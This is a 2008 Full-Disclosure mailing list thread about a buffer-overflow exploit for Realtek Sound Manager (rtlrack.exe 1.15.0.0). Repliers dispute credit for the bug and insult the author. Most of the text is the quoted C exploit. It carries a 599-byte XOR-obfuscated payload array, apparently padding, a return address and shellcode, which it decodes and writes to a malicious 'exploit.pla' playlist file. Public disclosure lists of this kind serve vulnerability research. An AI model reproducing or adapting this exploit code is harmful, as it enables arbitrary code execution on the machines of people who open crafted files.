Also you forgot to give the credit to shinnai who originaly found this bug :
http://milw0rm.com/exploits/7492 2008/12/19 j-f sentier <[email protected]> > "any jobs offers are ALWAYS welcome!" > Kmart is hiring, you'll may find a job there. > btw your code is horrible. > > > 2008/12/19 <[email protected]> > >> /* >> >> Realtek Sound Manager (rtlrack.exe1.15.0.0) Bufferoverflow exploit >> copyrights Bartosz Wójcik (Bartosz Wojcik) / bart^xt >> all rights reserved! >> >> any jobs offers are ALWAYS welcome! more on my websites: >> http://www.goldenline.pl/bartosz-wojcik5 >> http://wojcikbartosz.blogspot.com/ >> http://www.pelock.com >> >> P.S great KUDOS for my super friend ReWolf .-~> i hope you are >> earning nice money in ESSET Cracow! >> btw. New TAC is comming and ctrl-d will be up soon too! >> >> P.S2 OMEGARED (twoja stara pierze w rzece) >> >> SILESIA! SILESIA! SILESIA! catch me on ircnet/#crackpl/#crackscene >> >> ->>>>>> FLAMEZ TO ARTEAM AND WOODMANNNNNNNNN!! >> >> */ >> >> >> #include<stdio.h> >> >> unsigned char bad_data[599] = { >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, >> 0xEB, 0x41, 0x10, 0x95, 0xD4, >> 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, >> 0x3A, 0x41, 0xA9, 0xF3, 0x41, >> 0xAF, 0x42, 0x52, 0x55, 0x55, 0x55, 0xE5, 0xE3, 0xE3, 0xE3, 0xE3, >> 0xE3, 0xE3, 0xFB, 0xF0, 0xFC, >> 0xFE, 0xF2, 0x9C, 0x99, 0x9A, 0xFC, 0xF2, 0x9E, 0xEB, 0x9A, 0xE8, >> 0x9C, 0xE2, 0xE2, 0x9A, 0xE8, >> 0x99, 0x9A, 0xE8, 0xE9, 0xFC, 0xF2, 0x98, 0xE8, 0xEE, 0xE8, 0xE2, >> 0x9E, 0xEB, 0x98, 0xEB, 0xEE, >> 0x9A, 0xEB, 0xEE, 0xFE, 0xE8, 0xEE, 0xFB, 0xE8, 0x9A, 0xEB, 0xEE, >> 0xEB, 0xFC, 0xF2, 0x9E, 0xF0, >> 0x92, 0xE8, 0xEE, 0xE0, 0xE5, 0xE7, 0xE4, 0xE5, 0xE0, 0xE4, 0xEC, >> 0x9E, 0xE8, 0xFA, 0xE8, 0x9A, >> 0xE8, 0xFA, 0xE1, 0x92, 0xEF, 0xEE, 0xE4, 0xE9, 0xE1, 0x92, 0xE4, >> 0xED, 0xEF, 0x9A, 0xE0, 0xED, >> 0xEB, 0x9A, 0xE5, 0xE4, 0xE1, 0xE2, 0xE5, 0xFE, 0xE0, 0xEB, 0xE1, >> 0x92, 0xE5, 0xFF, 0xE8, 0xF8, >> 0xEB, 0x9A, 0xE1, 0xE4, 0xE3, 0xFE, 0xE1, 0xE2, 0xEC, 0x99, 0xE1, >> 0xE2, 0xEB, 0xFA, 0xFA, 0xE4, >> 0xEB, 0xE9, 0xE8, 0xE6, 0xE3, 0xF3, 0xE4, 0xE0, 0xEC, 0xE2, 0xE8, >> 0xE6, 0xEC, 0xED, 0xED, 0xFA, >> 0xEB, 0xE6, 0xE6, 0xE6, 0xE7, 0xFA, 0xEB, 0xFA, 0xEE, 0xE6, 0xE1, >> 0xE4, 0xEC, 0xE5, 0xE1, 0xE9, >> 0xEC, 0x9F, 0xEC, 0xF8, 0xEC, 0x9A, 0xEF, 0x9D, 0xEF, 0xE4, 0xE1, >> 0xF2, 0xE5, 0xEF, 0xEC, 0xE8, >> 0xEB, 0xFA, 0xE1, 0xE4, 0xE2, 0xEC, 0xE1, 0xE2, 0xE4, 0x9A, 0xE1, >> 0xEE, 0xE1, 0xE2, 0xE5, 0x9F, >> 0xE4, 0xEB, 0xEB, 0x9A, 0xE1, 0xE4, 0xE1, 0x92, 0xE4, 0xFB, 0xE1, >> 0x92, 0xEB, 0xFA, 0xE1, 0xE4, >> 0xE3, 0x92, 0xE4, 0xEF, 0xEC, 0x98, 0xEC, 0xFA, 0xE9, 0xE6, 0xEB, >> 0x99, 0xE8, 0xE6, 0xEC, 0xEC, >> 0xE1, 0xE2, 0xE8, 0x9E, 0xE8, 0x99, 0xEF, 0x92, 0xE8, 0xE6, 0xE0, >> 0xED, 0xE4, 0x9A, 0xE1, 0x92, >> 0xE8, 0x9E, 0xE4, 0xFA, 0xE1, 0xF2, 0xE8, 0xED, 0xE4, 0xEB, 0xE7, >> 0xE0, 0xE1, 0xF2, 0xE0, 0x9C, >> 0xE0, 0x9A, 0xE1, 0xE4, 0xE3, 0xFA, 0xE1, 0xE2, 0xE8, 0xE2, 0xE8, >> 0xE1, 0xE8, 0x9A, 0xE8, 0xFA, >> 0xE8, 0x9A, 0xE1, 0x92, 0xE0, 0xFC, 0xE4, 0xE9, 0xE5, 0xFF, 0xEB, >> 0x99, 0xE2, 0xE5, 0xE8, 0xEC, >> 0xE2, 0x9F, 0xE3, 0x92, 0xE0, 0xE5, 0xE9, 0xF2, 0xE8, 0xE6, 0xE1, >> 0x9D, 0xE8, 0xFF, 0xE0, 0x9C, >> 0xE8, 0xE5, 0xE6, 0xF2, 0xEC, 0xFA, 0xE5, 0x9F, 0xE0, 0x9C, 0xE0, >> 0xF3, 0xFA, 0xE5, 0xE6, 0x92, >> 0xFA, 0xFA, 0xED, 0xFF, 0xE5, 0xE5, 0xED, 0xE4, 0xE9, 0xFC, 0xEB, >> 0xFC, 0xE4, 0xEC, 0xE9, 0xFC, >> 0xFA, 0x98, 0xEF, 0xEC, 0xE0, 0x9D, 0xEF, 0x9C, 0xE8, 0xFA, 0xF0, >> 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, >> 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A >> }; >> >> >> int main(void) { >> int i; >> FILE *sploit; >> >> printf("Realtek Sound Manager (rtlrack.exe1.15.0.0) Bufferoverflow >> exploit\n"); >> printf("by Bartosz Wojcik (Wójcik) / bart^xt\n"); >> >> printf("http://wojcikbartosz.blogspot.com/\n<http://wojcikbartosz.blogspot.com/%5Cn> >> "); >> >> sploit=fopen("exploit.pla","wb+"); >> for (i=0;i<sizeof(bad_data); i++) bad_data[i]^=0xAA; >> fwrite(bad_data,sizeof(bad_data),1,sploit); >> fclose(sploit); >> return 0xDEADBABE; >> } >> >> -- >> Sell your gold jewelry and get cash fast! Click now. >> >> http://tagline.hushmail.com/fc/PnY6qxvKSSrw1jAHJmueLmVmgP43kLn7Pm0nmhJ1riw4dA2EWQPXq/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
